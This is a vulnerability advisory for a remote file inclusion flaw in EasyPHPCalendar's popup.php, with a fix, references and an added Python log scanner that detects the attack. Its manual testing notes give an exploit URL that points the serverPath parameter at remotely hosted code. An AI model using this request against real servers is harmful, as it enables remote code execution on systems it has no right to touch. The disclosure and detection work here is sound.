EasyPHPCalendar popup.php serverPath Variable Remote File Inclusion

2005-07-05T07:06:57
ID OSVDB:17731
Type osvdb
Reporter Mafia_Boy()
Modified 2005-07-05T07:06:57

Description

Vulnerability Description

EasyPHPCalendar contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /functions/popup.php script not properly sanitizing user input supplied to the "serverPath" parameter before it is used to include files. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 6.2.8 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Set the "register_globals" PHP option to "Off".

Manual Testing Notes

http://[victim]/calendar/functions/popup.php?serverPath=http://[target]/[remote code]
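For defenders reviewing web server logs, the request shape above can be matched directly. The following is an added example, not part of the original advisory or of EasyPHPCalendar: it flags requests to functions/popup.php whose serverPath query parameter decodes to a URL. The log format (common/combined), the sample lines, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address and request target of a common/combined-format log entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that would point an include at a URL instead of a local path.
URL_LIKE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|//)", re.IGNORECASE)

# Constructed sample lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jul/2005:07:10:01 +0000] "GET /calendar/functions/'
    'popup.php?serverPath=http://files.example/code.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [05/Jul/2005:07:10:09 +0000] "GET /calendar/functions/'
    'popup.php?serverPath=http%3A%2F%2Ffiles.example%2Fcode.txt HTTP/1.1" 200 512',
    '192.0.2.12 - - [05/Jul/2005:07:11:30 +0000] "GET /calendar/functions/'
    'popup.php?ev=42 HTTP/1.1" 200 2048',
    '192.0.2.13 - - [05/Jul/2005:07:12:02 +0000] "GET /calendar/index.php'
    '?serverPath=http://files.example/code.txt HTTP/1.1" 200 100',
]


def suspicious_serverpath(line):
    """Return (client, decoded serverPath) for a flagged request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not unquote(url.path).lower().endswith("/functions/popup.php"):
        return None
    # PHP variable names are case-sensitive, so match the name exactly.
    # parse_qs percent-decodes the value once, as the server would.
    for value in parse_qs(url.query).get("serverPath", []):
        if URL_LIKE_RE.match(value):
            return client, value
    return None


def scan(lines):
    """Collect flagged requests. Access logs show only the query string; with
    register_globals on, POST bodies and cookies can set the variable too."""
    return [hit for hit in map(suspicious_serverpath, lines) if hit]


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} requested popup.php with serverPath={value!r}")
```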

References:

Vendor URL: http://www.easyphpcalendar.com/
Secunia Advisory ID: 15893
Related OSVDB ID: 17723
FrSIRT Advisory: ADV-2005-0959
CVE-2005-2155
Bugtraq ID: 14131